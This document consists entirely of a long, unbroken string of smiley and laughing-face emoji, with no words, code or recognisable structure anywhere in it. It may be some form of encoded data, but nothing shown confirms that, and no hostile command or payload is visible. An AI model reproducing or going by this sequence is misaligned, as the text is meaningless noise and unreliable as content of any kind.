😊😉😆🙃😂😅🤣😂😜🤣🙂😅😃😆😉😁😁😄😇😃😅😀😃😅🤣🤪😜🤪🙂😇😃😝😉😉😁😉😇🙂😅😂😂🤪😂😅😀😆🙃😁😄😁😊😃😆😀😇😜😅😜🤪😝😂😇😀😊😝🤣😄🙃😊🙂😆😂😁😊🤣😉😜😆🙂😁😃😄😜😆😉😆😄😀😇😄😅😀😀😄😀😃🙂😉😃🙃😉🙂🤣😝🤣🙂😉😇😇😊😜😊😂🤣🙂🙃😄😊😉😜😁🤪😇😝😉😁😅😀🤪🤪😆😇😀😀🙃😀😄😄😉🙃😆🤣😇🙂🤣😀😃😂😃😅🙃😜😄🤪😊😝🙃🙃😆😉😝🙂😅🤪😀😃😂😇😉😝😁😅😇😆😅😁😁😀😉😝😃😜🙂😆🤪😇🤣😂😝😀🙃😄😅🤪🤪🙃😂🙂😀😂🤪😅🤣🙂🤪😊😅😜😝😅🤣😉😜😀😂😜😀🤪🤪😀🙃😆😃😇😊😇😁😉😇😊🤣😊🤪😊🙂😂😝🙂😆😀😇😄😅😃🤪😀🤪😃🤣😃😜😇🙂😉😃🤪😉🙃😁😅😊😝😅😂🤪🙂🤣🤪😀😄🙃😂😆🙂😆😅😝😀😅😜🤪🤪🤪😊😂😃😃😁🙃🤪😆🤪😆🙂😝😂🤣🤣😜😅🙂😆😃😁😝🤣😂😃😄😆😆😜😝🤪🤣😝😜😇🙂😊😃😉🤪😀😂🙂🙂😊😅🤣😆😉😂😊😀😁🙃😄😄😃😀😀😉😊😄😜😝🤣😅😃🤪😝😂😝😇😝😄🤪😊😂😆🤣😝😅🙃😅😆🙂🙂😁😆😉😂😀😜😝😇😃😅😀😝😇🤣😊😜😉😝😄🙂😊🤪🙂😄🤪😇🤪😅😆🤪😁😂😄😂🙂😜😜🙃😃😃🙃😊😀😁😇😊😇😆😝😝🤪😇😜😉😂😄🤣😊😅😆😆😃😊😝😂😅🤪🤪😃😂😝😀😝🙃🤣😄😀🙃😝😆🙃😝🙂🤣😇😝😂😂😂😃😂😉🙂😜😂😅🙂🤪😃😂😀😜😜😝😃🤣😁😃🤪🙃😇😁😂😊🤪🤪😀😂😝😀🤣🙃😅😄😆🙃😅😇😄😄🤣😄😀🤪😉😇😊😉😁😉😀😄😊😊😉😆🙃😆😜😇🙂😅😜😜🙃😂🙃😉🙃😁😄😇😃😅😀😄😜😇😜🤣😜😜😃🙂🙃😃🤪🤣😉😇🙃🤪😝😜😆😂😅😀😆🙃😁🤣🙂😃😉😉🤪😁😁😉😆😅🤣🤪🤪😂🤪😀🤪🤣😇😄😀😊😀😆😄😇🙃🤪😊🙂😁😃😄😉😃😁😀😊😜😇🤪😄🙂😉😇🤣😀🙃🙂😃🙃😉🙂😁😂😀😝😊😉😅🙂😊😂🤣😂😀😆🙂😁😃😆😉😇😁😃😊😝😅🙃🤪🤪😂😇😅😜🙂😆😊🤣😆😅😝😆😉🙂😆😀😇🤪😆🤣😂🤣😃🤣😊😜😁😉😊😉😁😁😉🙃😁😅😉😁😃😜😅🙂😝😝🙂😀😃🤪😆😇😜😝🙃🙂😀😇🙂🤪😀🙂😂😜😀😊🙂😂😊😃😂😉😜😀🤣🤪😜🙃😄😄😜😁🤣😊🙃🙃😅😇😝😆🤣😄😝😉😀😉😇🙂😆😂😝😅😆😂😝😃😁🙃😇🙃😁😂🤣😜😆😀😊😃😄😊🤣😁😄😇🙃🤪😃😇😅😂😄😀😉😀😃😝🙃😜😇🙂🙃🙃😃😃😁😜😀😁😂🤪😀😉😁😁😀😆😂😅🤪😜😂😆😉😆😂😅🤪😝😃😊🤪😊🤣😅😝😁🤣🤣😝😉😀🙃😇😂😆😉😇😃😆🤣😇🙂😀😅😂😝😜😜😅🙂😆🤪😄😃😂😆😀😁🙃😄🤣😁😀😉🙂😊😜😝😂😀😉😂😂😀🤪😇🤣😇🙃😁😅😆😝😄😅😄😇😁😜😉😇🙃😁🙂😊😀🤪🤣😊😀😃🤪😉😃😃😂🙃😀😃😇🙃🤣😊🤪🙂🙃😜😅🙂😁😜😄😄🤣😉😀🤣😊🤪😄😅🤣😇😝😅😉😇😂😜😝😇😉😁🙂😊🙂😁🙂😉😝😄😝😅😉😄😆😉😄😇😊🙃🙂😀🤣😆🙃😜😇🙂😉😜😄🤣😊😜🙂😂😄😝🤪😀😉😁😉😇😁😅😄🤪😃😃😜😆😄😝😅😜😝😊🙂😅😝😅😜😅🙃🤪🙂😂😂😀🤣🙃😅😄😆😉😁🙂😃😇🙃😂😅🤪😜😂🤪😀😝🤪🙃🙂😇😁😄🙂😉😁😊😝😊😅😜😜😊😂😅😃😂🙃😊😁😀😊🤪😄😁😝😂😂😀😀😀😂😇😃🙂🙃😇😄😝😅😉😜😀😂😅😀😆🙃😁🤣🙃😃🤣😊😆😄😄😇😁😅😜😜😄😂😆😜😝🙂🤪😊😀😆😜😝🤣🤣😅😜😆😇😊😂😅😜😁😂😉😀🙂😉😂😁😅😊😂🤣😀🙃😃😃🙃😉🙂😁😂😀🙃😇😆😅😄🤪😃🤣😂😜😆🙃😆😉🤣😁🤪😇😝😅😇🤪😊😂😉😀🙃😝😅🤣😂😊🙃😅😄😝😆🤣😁😜😄😝😁😂😅😀😝🙃😄😄😄😊🤪😄🤪😝🤪😅🤪😜🙂🙂😂😀😊🙃🙃😅🙃😅😁🤪😄😂😃😀😀🙂😜😅🤪😀😀😂😇🙃😄😅😜🤪🙃😂🙂😀😂😀🤣🙂🤣😃😝😊😅😆😅😄🙂😜😂😂😜😀🤪🙃😝😂😜😄😊😉😊😅😀😝🤣😅😇🤪😉😃😂😉😆😁😁😇😄😅😃🤪😀🤣😜😆😊😇😝😃🤪😉😊😁😉😇🙃😅🙂🤪😂😜🤣😆😂😝😆😃😊😊😝😆😃😝😀😅😜🤣😀🤪😀😂😊😀🙃🙃😝😄🙂😊😆😁😇😇😊🤣😂😜🤣😀😊😉😝😁😃😇😀😆😜😄🙃😉😃🤪😉😁😝🙃😝😝🤣😆😂🙃😃😜🤪😁😜😉😃🙃🙂🙃😄😄😃😊😀😁😜😇🤪😅😝🤪😇😂😊😉😀😉😊😄🙂😊😂😆🤣😄🙂😊😊😄😅😉🙂😝😆😂😀😃🤣🙂😅😀😆😄😇😇🙃😅😝🤪🤣😅😉😇🙃😆😀🙂🤪🤪😇😝😊😂🙂😀😃🙃😀😃😜🤪🤣😄😂😝🙃😄🤣😜😜🙂🤪😁😊🙃😂😄🤣😊😅😆😆😝😁🤪😄😁😝😇😀😝🤣😉😆😄😝😊😇😆😊🤣😇😉😆😃😜🤪😂🙃🤪😝😊😄😊😇😁😅😄🤪😃😂😀😜😜🙂🤪😆😜🤪😇😁😁😝😂😅🙃🤪🙂😂😂😆🙂😊😁😜😄😄🤪😂🙂🙃😁😜🤣😆😂😂😉😊😉😀😝😆😉🙂😜😉🤪😝😜🤣😂😜🤣🙂😅😅🙂😀🙂😉😅😁😅😇😄😆🤪🤪😂🙃😁🙃😆😃😊😉😉😁🙃😃😆🙂😆🤪😉😁😂😂😂🤪😀😆🙃😉😁😀😂😝😁😅🤪🤪😝😂😇😂😄😜😊🙃🤣😃😝😆😉😝🤪🤣😅😜😆🙂😁🙂🤣😃😀😉😁😁😁😇😀😆🤣😝😉🤣😄🤪😜😃😜😉🙂😁😂😇🤣😉😉😂🤪😃🤣😁😝😅😜😉😝😆😅😆😆😇😝😅😇🤪😊🙃😂😃😝😄😅😁😆🤣😝😉😆😀🙂🤣😉😜😄🙂😃😃😀🤪🤪🙃😀😄😂😊😃😁🤪😝🤪🤣😇🙂😀😃😝😉🤣😁😅😇😆😊😊🤣😇😃😄🙂🤣🤣😝😂😁😊😀😆😃😇😊😅😉🤪🙃😇🤪🤣🙂😀😄🙃😉😃🙃😆🤣🤪😝🤣😃😜😀😂😜😃😂😊😂😄🙂🙂😁😇🤣😄😂😁😃😝😊😄😜😂😇😝😂😄😉😂😉😝😜😁😆😁😂😝😀😁😄🙂😅😝😊😄😉😂🤪🤪😅😄😇🙂😃😉😝🤪🙃🤪😉😊😇😆😃😝😀😅😜😆😀😜😄😂😉🤪🤪🙂😜😄😊😊🤪😆😀😇🙃😅😉😃😄😃😁😉😄😁😃😝😄🤪🤣😝🤪🤣😝😜😇😊😜😃😉😉🙃😁🙂🤪😂😅🤣🤪😅😂😆😀😁🙃😄😄😃😇😜😁😜🤪😀😅😝🤪😇😂😝😀😉😉🤣😄🙂😊😂😆🤣😝😅🤣😆😜😁🙂😄😃😃😉😄😄😜😇😀😆😝🤪🤪🤣😊😜😉🙂😉😃🙂😇😂😁🤣😇😅😅😆😜😅😂😄😀😃🙃😄😃😜😝🙂😁😝😇😇😅😊😜😇😂🙃😀🙂🙃😉😄🤣🤪😄😆😆😝😁🤣😄😀😁🙂😀😀😜😉😄😄😝🤪😁😆😊😝😉🤣🙃😜🙂🙂😂😃🤣😉🤣😁😆😇😂😅😄🤪😁😂😀😜😜🙂🤪😃😝😉😝😁😊😇😉😅🙃🤪🙃😂😂😃🙂🙃😅😄😆😊😅😆😄🤪😃🤣😀🤪😜😂🤪😄😝🙃😇😄😊😊😇😆🙃😝😉🤣😂😄🤪🙂😅😁😆😉😁😁😄😇😁😅😀🤪😃🤣🤪😄😁🙂😇😄😝😉😉😁🙃😇😊😅😂😃😃😂😅😀😆🙃😁😁😆😊😃😆😀😝😁😅🤪😃🙂😂😇😀😊🙃😉😆🙃😊🙂😆😂😝😊🤣😅😜😅🙂😁😃😁😉😃😅😀😊😜😆🤪🤪😄🤣😇😀😀🙂😉😃😝😉🙂😅😂😇🤣😅😅🤪🙃😂😁😀😂🙃😃😅😉😉😜😅🤪😇😝😅😇😜😃😂😉😀😉🙃🙂😄🤪😊🤣🤣😅😝😆🤣😁😜🙂🙂😃😃🤣🙃😜😁😜😊😝😅🤪😝😊🤣😉😀😀🙂🙂😆😊😉🤣😁😅😇😆😂😁🤪😄😂😃😀😂🙂😜😄😅😉😝😂🙂😇😊😂😉🤪🙃😂🙂😀🤪🙃🤣😄😇😊😆🤣🤣😝😄🙂😃😜😀😂😜😃😅🙃😝😁😁😊😊🤣😊😝🙃🤣🤪😆😁🙂🤣😃🤪😉😆😁😁😇😄😅😄🤪😀😂😁😜🤪🙂😝😊🙃😉😊😁😉😇🙃😅😉🤪😂😂🤣😀😅🙃😆😇😀😊😄😆😃😝😀🤣😀🤪🤪😂😝😀😇🙃😊😇😂😊🙃😆🙂😝😂🤣🙃😜😅🙂😆😃😁😉😄😇🤪😇😀😆😜😝🤪😂😃😜😇🙂😊😃😉😉🙃😃😁😇😂😅😝🤪😅😂😝😀😁🙃😁😄😃😇😄😁😜😇🤪🤣😆🤪😇🙂😊😀😉🙃🙃😄🙂😝😂😆🤣😝😅🤣😊😜😁🙂🙃😃😃😊😂😄😜😝😀😆😝😝😇😂😆😜😉😉🙃😃🙂😉😂😁🤣😝😂😅😆🤪😁😂😇😀😃🙃😅😃😜😉🤪😁😝😝🤪😅😊🤪😉🙂😆😀🙂😉😉😄🤣😊😅😆😆🤪😅🤣😄😜😃🙂😇😀😜😇🤣😄😝😊😇😆😊😝😉🤣🙃😜🙂🙃😀😃🤣😊😃😁😆😇😅😅😄🤪😃😂😀😜😜🙃😅😃😝😊😅😁😊😇😇😅🙃🤪🤪😂😂😀🤣🙃😇😄😆😝😇😆😄😝😄🤣😀🤪😜😂🤪😃😃😉🤪😄😊😊😉😆🙃😀😃🤣😂😜😂🙂😅😃🙂😊😅😁😄😇😃😅😀😀😜🤣🤪😜🤪🙂😇😄😝😂😉😁🙃😇😜😅😂😀😜😂😅😀😆🙃😁😁😆😅😁😆😀😝😂😅🤪😀😝😂😇😀😊🙃😉😁😊😊🙂😆😂😝😜🤣😅😀😜🙂😁😃😄😉😃😆😄😊😜😆🤪🤪😂🤣😇😃😂🙂😉😃🙃😉🙂😆🙃😇🤣😅😅🤪😜😂😁😀😇🙃😃😄😀😉😜😁🤪😇😝😅😇😜😁😂😉😃😆🙃🙂😄🙃😊🤣😆😅😝😆🤣😁😜🙃🙂😃😃😄🙃😜😄😜😊😝😅🤪😉😊🤣😉😀😀🙂🙂😁😇😉🤣😁😅😇😆😂😁😉🙂😂😃😀🙂🙂😜😄😀😉😝😅😅😇😊😅😉🙃😉😂🙂😀😜🙃🤣😄🤪😊😆😆😁😝😄🤣😃😊😁😂😜😃😅🙃😝😄😇😊😊😅😁😝🙃🤣😇😀🙃🙂🤣😃😅😉😆😂🙃😇😄😅😄🤪😀🙂😜😇😆🙂😝😄🙂😉😊😆😅😇🙃🤣😂🤪😂🙂🙂😄😊🙃😆😁😃😊😄🤣😃😝😀😅😜🤪🤪🙂😜😀😇🙃😊😁🙃😊🙃😂🙃😝😂🤣🤣😜😅🙃🤣😃😁😉😄😆😃😇😀🙂😅😝🤪🤣😝😜😇🙃😝😃😉😉🙃😆🙃😇😂😂😉🤪😅😂😆😀😁🙃😄😄😃😊😀😆😝😇🤪🤣🤪🤪😇😂😝😀😉🙃🙃😄🙂😊😂😅😄😝😅😂😄😜😁🙂😆😃😃😉🤣😄😜😊🤪😅🙃😝😇😊😃😜😉🙂😉😃🙂😉😂😁🤣😇🙃🤣🤣🤪😁😂😄😀😃😝🤣😃😜😉😜😁😝🤪😇😆😉🤪😉🙂😅😀🙂😉😄😄🤣😝😁😆😆😜🙃😆🤪😜😃🙂😇😀😜🤪😀😄😝😊😝😆😊😜😂🤣🙃😜😇🙃🙃😃🤣😉😅😁😆😀😅😅😄🤪😄😂😀😀😁😉😀😃😝😉😇😁😊😃😀😅🙃🤪🙃😂😂😄🤣🙂😆😄😆😊😜😆😄😝😇🤣😀😀😆😂🤪😄😝🙂😊😄😊😇🤣😆🙃🤪😆🤣😂😀😊🙂😅😁😆🤣🙃😁😄😇😝😅😀🤪😊🤣🤪😄😜🙂😇😃😊🤪😀😁🙃😝😆😅😂🤪🙂😂😅😀😅🙃😁😄🙂🤣😂😆😀😝🤣😅🤪😄😄😂😇😀😇🙃😉😄😊😊🙂😆😊🤪🙂🤣😅😜😆🙂😁😆😂😉😃😁😃😊😜🤣😀😉😝🤣😇😀😄🙂😉😄😝😉🙂😁😂😇🤣😅😅😇😃😂😁😀🙃🙃😃😄😃😉😜😁😜😇😝😅😇🤣😁😂😉😃😀🙃🙂😄😂😊🤣😆😅😝😆🙂🙃🙂😆🙂😃😃😂🙃😜😂😇😊😝😆😝😝😊🙂😀😜🙃🙂😇😄🙃😉🤣😁😅😇😆😉😃🤪😄😂😄😀😀🙃😁😁😀😉😝😁😇😇😊😇😆🤪🙃😂🙃😀😂😉🙂😜😅😊😆😆😉😝😄🤣😉😜😀😂😜😀🤪😊😝😜😄😊😊😅😄😝🙃🤣😉😜😂🙃😜😃😅😉😆😅😊😇😄😅🙃🤪😀😂😃😜🤪🙃🤣😃😇😉😜😆😇😇🙃😅🙂🤪😂😝🤪😀😅🙃😅😄😁😝😄😀😂😝😀🤣😊🤪🤪🙂🙂😀😇😉😉😄😉😇😊🙃😊😝😂😂😆😜😅😉😆😃😁😉😄😁😃😝😄😆😜😝🤪😂😇😜😇😊🤪😃😉😉🙃😁🙂😝🙃😅🤣🤪😅🙂😆😀😁😇😊😄😃😊😀😁😜🤪😀😅😝🤪😇🙂😇😀😉😊😃😄🙂😊😂😆🤣😝😅🤣😆😜😁🙃😀😃😃😊😃😄😜😇😀😆😝😝😇🤣😊😜😉🙃😅😃🙂😊😅😁🤣😇😂😅😆🤪🙃😂😄😀😃🙃😇😃😜😃😄😁😝😇😝😅😊🤪😊😂🙃😀😇😉🙃😄🤣😊😅😆😆😁😂🤣😄😜😄🙂😀😄😜🤣😆😄😝😇🙂😆😊🤪😅🤣🙃😀😂🙂😂😄🙂😇😊😁😆😝😃😅😄😀😃😂😀😜😜🙂🤪😄😜😉😇😁😊😝🙃😅🙃🤪🤪😂😂😀🤣🙃😅😁🤣😊😁😆😄🤪😃🤣😀😄🤣😂🤪😀😝🙃😇😁😝😊😉😆🙃🤪🙃🤣😂😃🙂🙂😅😃😆😉😁😁😄😇😃😅😀🤪😝🤣🤪😀🤪🙂😇😃😝😉😉😁🙃😇🙂😅😂😜😄😂😅😃😄🙃😁😄😆😊😃😆🤣😇😜😅🤪😜🙃😂😇😂😁🙃😉😄😉😊🙂😆😂😝🤣🤣🙃😀🤣🙂😁😃😄😉😃🙃🙂😊😜😆😜😝😝🙂😇🤪😉🙂😉😄😅😉🙂😁🙂😇🤣😅😇🤪😆🙃😁😜😃🙃😃😄😇😉😜😆😉😇😝🤣😝🤪😊🙃😉😜🙂🙃🙂😁😆😊🤣😅😀😝😆😂😅😜😄🙃😃😊😃🙃😜😁😉😊😝😅🤪😝😊😂😂😜🙃🙂🤪😇😝😉🤣😁😇😇😆😉😅🤪😄😂😄😀😀🙃😃😃🤪😊😃😆🤪😇😊😅😉🤪🙃😇😉😀😂🙃😂😄😅😊😆😊😊😝😄🤣🙂😜😀😂😜😀🤪🙃😝😄😇🤪😃😉🤣😝🙃🤣😜😜😂😇🤪😃😅😉😅😁😁😇🤪😅😃🤪😆🙂😃😜🤪🙂😝😃😇😜😁😁😉😇😉😅🙂😀😂😁😇😀😅🙃😊😄😁😊😆😆😃😝😁😅😜🤪🤪😁😃😀😇😉😄😄😉😊😊😆🙂😝🙃🤣🤣😜😅😜😊😃😁😉🙃😁😃😇😂😆😜😝🤪🤣😝😄😄😃😝😃😉😊😀😁🙂😁😉😅🤣🤪🤣😂😆😄🤪🙃😄😄😅😇😄😁😜😇🤪😅😝😅😜😂😊😀😊🙃🙃😄😇😇🙃😆🤣😝😅🤣😆🙂😀🙂😄😃😄😉😀😆😃🙂🤪😆😝🤪😁🤣😊😀😄🙂🙃😃🙂😉😂😆🙂😜😇😅😆🤪😊😂😄😄😃🙃😀😃😜😉🤪😆😜😇😇😅😊😜😁😂🙃😄😄🙃😂😄🤣😊😅😅🤣😝😁🤣😄😜😊🙂😀😁🤪🙃🤪😄😝😊😇😅😝😝😉🤣🙃😀😁🙂😂😆🤣😉😅😁😆😇😁😅😄🤪😃😂😀😀😂🙂🤪😄🙂😉😇😁😝😇😉😅🙃🤪🙂😂😂😀😝🙃😅😄🤣😊😁😆😁😝😃😂😄🤪😜😂🤪😃😆🙃😇😁😁😊😉😆🙃😝🙂😂🙃😜🤣🙂😅😃😇😉😁😅😄😇😃😅😀😝😜🙂😀😜😝🙂😇😄😆😉😉🤣😅😇🙂😅😂🤪🤣🙂😂😀😆🙃😁😄😇😊😃😆😄😇😜😅🤪🤪😝🙂🤪😀😊🙃😉😁😆😊🙂😅😄😝🤣🤣😅😜😆🙂😁😃😄😉😃😁🙂😊😜😅🙃😝😝🤣🤪😜😊🙃😇😃🙃😉🙂😆😀😇🤣🙂😉🤪😆😂😁😀😄🙃😃😄😀😉😜😆🙂😇😝🤣😀🤪😊😂😉😀🙃🙃🙂😄😂😊🤣😆🤪😝😆🤣😅😜😄🙂😁😃😀😊😃😄🤪😊😝😅🤣😝😊🙂😉😜🙃🙂🙂😃😂😊🙂😁😅😇😆😅🤪🤪😄😉😇😀😀🙂😜😃🤪😊😜😁😇😇😊🤣🤣🤪🙃🙂🤣😀😂🙃🤣😄😅😇🤣😆😁😝😄🤣🤪😜😀😉😝😀🤪🙃😝😄😇😊😊😆😉😝🙃😂😄😜😂🙃😁😃😅😉🤣😁😁😝😆😅😃🤪😀😂😉😜🤪😇😄😃😇😉😊😁😉😇🙃😅🙂🤪😂🙂😄😀😅🙃😂😄😁😊😄😆😃😝😀😅😜🤪🤪🙂🙂😀😇🙃😝😄😉😊😊😆🙂😝😂🤣🤣😜😅🙂😇😃😁😉😉😁😃😇😊😆😜😝🤪🤣😝😜😇🙃😄😃😉😉😊😁🙂😇🙂😅🤣🤪😅😀😇😀😁🙃😄😄😃😊😃😁😜😇🤪😅😝🤪😝😂😊😀😉🙃🙃😁🤪😊😂😆🤣😝😅😅😊😜😁🙂😄😃😃😉😀😄😜😊🤪🙂🙂😃😇😁😄😀😀🙂🙃😃🙂😉😂😄😆🙃😃😆😝😄😀😂😉😅🤪😄🤣😁😆😉🤪😁😝😇😇🙃😜😅😁🤪😇😂😇😜🙂🙃😆😃🙂😉🙃😃🙃😝😆🤣😀🤪😝😅😄😀🤣🙂🤪😄🤪😉😇😁😝😝😝😅😝😜🙃😉😊😉😅😁😆😇😁😅😄🤪😃😂😀😅😃😇🤪🙂😄😊😆😁😊😇😉😅🙃😁🙂🤪🤣😂🙃😜🤪🙃🙂😃😇😊😃😁😜😜🤣😜😅😂🤪😀😝🙃😇😁😂😇😝😝🙃😇😀😇😄😇😊🤪😉😃🙂😉😁😁😄😇😃😊🤪😆😆🤪🤣😂😃😄😄😄😇😉😉😁🙃😇🙂😊😝😆😜🤪😂🤣🙃😜🤣🙂🤪😃😉😉😁😁😉😇😄😅😄😜😀😂😀😜😝🙃😝😄😂😊🙃😀😉🤣😝😜😆🙂😁😃😄🤪😝🤣😇🤪😃😁😝🙂😇😀😆😂😇🤪😅😂🤪😉😝😁😂😇🤣😅😅😁😊🤪😄😂😆😀😅🙂🙂😊😄😆😆😇😝😅😇🤪😊😇😉🤣😉😀😉🙂😇😄😆😊🙃😇😇🤣🙃😜😄🙂😃😃😀🙂🙂😉😂😉😂🙂😆😇🤪😃😆😜😇🙃😅😃😂😉🤣😁😅😀🤣😉😁😃😆🙂😄😜🤪😆😊🤪😀🤣😁😇🙂😁😉😊😜😄🤪😉😅😇😝🙃🤣😄😅😊😆😆😁😝😄🤣😃😃🤣😊😜😉😆😉😀😄😇😊😊😆😉😄😄😝😊😁🙂😃😇😃😉😉😆😁😁😇😄😉😂😆😃😝😊😂😁😜😄🤪😄😉😊😁😉😇🙃😅🙂🤪😂😂🤣😜😅😝😁😃😊😊🤣😆😃😝😀😅😜😁😝🙃😅🤪😝😁🤣😄😝😇😆😆🙂😝😂🤣🤣😁😇🤪🙃🙂😂🤪😅🙃🙃😄🙃😊😊😆😄😝😜🤣😃😜🙃😆🤪😊😂😁🙂😇😂😅🤣😄😇😝🙃😂😂😝🤣🙂🤣😄😁😉😄😁😁😇😊😅😀😝😇😂🙂😀😝🙃😊😉🤪😆🤣😝😅🤣😆😜😁🙂😄😃😃🤪😆🤣😜😊🤣😅😅😝😇🤣😊😜😉😝😃😂😊😜🙃🙂😀😀🤪😉😝😁😊😊😝😆😄🙃😀😃😜😉🤪😆😜😊😝😅😊🤪😉😂🙃😀😜🙃😂😄🤣😊😅😆😆😝😁🤣😄😜😄🙂😀😀😜🙃🤪😄😝😊😇🤣😊😝😉🤣🙃😜🙃🙂😂😃😂😉😅😆🙂😇😁😅😄🤪😃😂😀😀😀🙂🤪😃😜😉😇😁😝😇😉😅😝🤪🙂😂😂😀🤣🙃😅🤣😄😊😁😆😁😝😃🙂😀😊😅😂🤪😃😄🙃😇😄😜😊😉😅🙂😝🙂😂🙃😆🙃🙂😅😃😊😉😁😆🙂😇😃😅😀😝😜🙂😀😜😝🙂😇😄😁😉😉😆😊😇🙂😅😂🤪🤣🙂😂😀😆🙃😁😄😊😊😃😆🤣😇😜😅🤪🤪😝🙂🤪😀😊🙃😉😁😁😊🙂😆😊😝🤣🤣😅😜😆🙂😁😃😄😉😃😁😂😊😜😅🙂😝😝🤣🤪😜😊🙂😉😃🙃😉🙂😁😇😇🤣😅😇🤪😆😂😅😀😄🙃😂😄😀😉😜😆😁😇😝😂😁🤪😊😂😊😀🙃🙃🙃😄😂😊😉😅😂😝😆🤣😁😜😄🙃🙂😃😀😉😀😄🤪😝😝😃😄😝😊🤣😜😜🙃🙂😇😃😂😊😅😁😅😝🤣😂🙃🤪😄😂🙂😀😀😉😅😃🤪😉😝😁😇😝😝😅😉🤪🙃🙂😀😀😂🙃😜😄😅😊😆😆😁🤪😆🤣😃😜😀🙂🙂😀🤪😉🙃😄😇😊😊😆😉🤪😊🤣🙂😜😂🙃😀😃😅😊🙃😁😁😇😄😅😃🤪😀🤣😜😜🤪🙃😆😃😇😊😅😁😉😇😊😅🙂🤪😂😂🤣😀😅🙃🙃😄😁😊🙃😆😃😝😄😅😜😜😆😂😝😀😇😉😀😄😉😜😂😆🙂😝🙂🤣🤣😜😅🙂😆😃😂😊😆😁😃😇😀😆😜😃😇🤣😝😜😝🙂😊😄😇😂🙃😁🙂😇😇😅🤣🤪😇😂😆😀😁🙃😄😆😃😂🤣😁😜😝😆😅😝😜😀😂😊😃😝🙃🙃😄🙂😝😜😆🤣😝😊🤣😆😜😅🙂😄😃🙂😉😀😁😁😝😀😆😝😝😇🤣😊😁🤣🙂🙃😃🙃😉😂😅🤣🙂😊😅😆🤪😝😂😄😀😉🙃😀😄🤪😉🤪😆😜😜😄😅😊😜🤣😂🙃😃🤪🙃😂😄🤣😊😅😅🤣😝😁🤣😄😜🤪🙂😀😃😇🙃🤪😄😝😊😇😅😝😝😉🤣🙃😀🤣🙂😂😃🙂😉😅😁😆😇😁🤣😆🤪😃😂😀😀🤪🙂🤪😃🤪😉😇😁😊😇😉😅🙃🤪🙂😂😂😃😄🙃😅😁😁😊😁😆😆😝😃🤣😀🤪😜😂🤪😃😂🙃😇😁😂😊😉😆😊😝🙂🤣😝😜🤣🙂😅😃🤪😉😁🤣🤪😇😃😅😃😝😜🤣🤪😜😝🙃😀😄😝😉😉😁🙃😇🙂🙃😁🤪🤣😂🤣😀😆🙃😁🙃😉😊😃😆😉😇😜😅😜🤪😝😂😇😀😊😊😉🤪😜😊🙂😅😃😝🤣🤣😜😜😆🙂🤣😃😄😇😃😃😜😊😜😅😉😝😝😂😀😜😊🙂😜😃🙃😉🙂😀😆😇🤣😅😜🤪😆😂😜😀😄🙃😁😄😀😝😅😄😉😇😝🤣🤣🤪😊😉😅😀🙃🙃🙃😄😂😇😆😆😅😝🙂😂😅😜😄🙂😃😃😀😇😉😄🤪😊🤪😆😇😝😜😂😇😜🙃🙂🙂😃😂🤪😄😁😅😇😅😅😁😜😆😆😃😀😀🙃😉😃🤪😊😅😁😇😇😊😅😉🤪🙃😇😉😀😂😉😄😄😅😊😝😆😁😝😄🤣😃😜😀😂😜😀🤪😉🙂😄😇😊😝😆😉😝😉🤣🙂😜😂🙂🤣😃😅😉😜😁😁😇😆😅😃🤪😀🤣😜😃🤪🙂😝😃😇😊🤣😁😉😝😆😅🙂😜🙂😂🤣😀😅🙃😆😄😁😊😝😆😃😝😄😅😜🤪🤪😂😝😀😇🙃😊😄😉😇😆😆🙂😝😉🤣🤣😜😅🙂😆😁😁😉😄😁😃😇😇😆😜🤪😄🤣😝😀😂🙂😊😁😉😉🙃😁🙂😝😁😅🤣😜😃😂😆😃😁🙃😄😆😃😊😀😁😜😝😉😅😝😜🙂😂😊😃😉🙃🙃😄🙂😊😂😆🤣🤪😀🤣😆😜🤪🙂😄😃😝😉😀😁😅😊🤪😆😝🤪😂🤣😊😁😅🙂🙃😃🙃😉😂😁😂😇😅😅🙂😜😅😂😄😀😃🙃😀😅😉😉🤪😁🤪😇😇😂😊😝🙃😂🙃😃😁🙃😂😄😉😊😅😆😜😝😁🙂😄🤪😀🙂😀😃😉🙃🤪😁🙂😊😇😅😅😝😉🙂🙃🤪😂🙂😂😄😃😉😅😁😜😇😁🤣😄🤪😃😂😀😜😄🙂🤪😄🙂😉😇😁🤪😇😉😅🙃🤪🙂😂😝😊😇🙃😅😄🙃😊😁😅😝😝😃🤣😃🤪😜🙂😀😀😝😉😀😁😝😊😉😆🙃😝🙂🙂😄😜🤣🙂🤣😃😆😉🙃🤪🙂😇😃😅😀😝😜😂😁😜😝🙂😝😃😊😉😇😁🙃😇😇🤣🙃🤪🤣😂😅😀😆🙃🙂😄😄😊😄😆😀😇😜😜🤣🤪😝😂😇😀😊🙃😊😄🙃😊🙂😆😂😝🤣🤣😅😜😆🙂😁😃😄😉😃😁😃😇😃😆🤪😝😝🤣😇🙃😃🙂😜😃🙃😉🙂😁😂😁🤣😊🙂😆😅😝😜🤣🤪😇😅😄😆😉😜😁🤪😇😝😝😁😆😇🤪😁😂😝😉😁😄😂😊🤣😆😅😝😉🙃😀😜😄🙂😃😃😀😉😄😄🤪😊🤪😆😇😝😇🤣😉😜😝🙃😉😃😂😉🤣😁😅😇😂😅😁🤪😁😂😃😀😆😉😃😃🤪😉😝😁😇😝😅😅😉🤪😉😂🙂😃🙃🤣🤣😄😅😊😅😆😁😝😆🤣😃😜😀😂😜😀🤪😂😉😄😇😊😇😆😉😝😉🤣🙂😜🙂🙂🤣😄😂😂😆😁😁😇😁😅😃🤪😃🤣😜😜🤪🙂😝😄😄😜😂😁😉😇😊😅🙂🤪😂😂🤣😀🤣🙃😆😄😆😊😄😆😃😄🙂😅😜🤪🤪😂😝😀😇🙃😊😄😉😊🙃😆🙂😀😝🤣🤣😜🤣🙂😆😃😅😉😄😁😄😇😀😅😁😜😀🤣😝😜😇🙂😊😃😉😉🙃😁🙃😇😂😅🤣😂😝😂😆😀😁🙃😄😄😄😊😀😁😜😇🤪😅🤪🤪😇😂😊😀😉🙃😝😄🙂😊😂😆🤣😁😉🤣😇😜😁🙂😄😃😃🤪😜😉😅😄😁😊😜😆😆😝😀😅😊🤪😝😂😝😉😊😁🤣😇😅😅😆😄😊😝😂🤣😄😜😆🤪🤣😊😅😁😝😇😇😅😊😄🤪😝🤪😂😊😀😊🙃🙂😄😆😊😝😇😊🤣😊😜😃🙂😀😀😜🤪😃🙃😅😃😝😊😝😁😊😇😇🤣😇🤪😇🙂🙂😉😇😁😆😇😁😅😄🤪😃🙂🤪😜😜🙂🤪😃😝😉😇😁😊😇😉😅🙃😀🙂😂😂😀🤣🙃😅😄😆😊😁😆😄😝😅🤣😀😀😜😂🤪😀😝🙃😇😄😊😊😉😆🙃😝😉🤣😂😃🤣🙂😅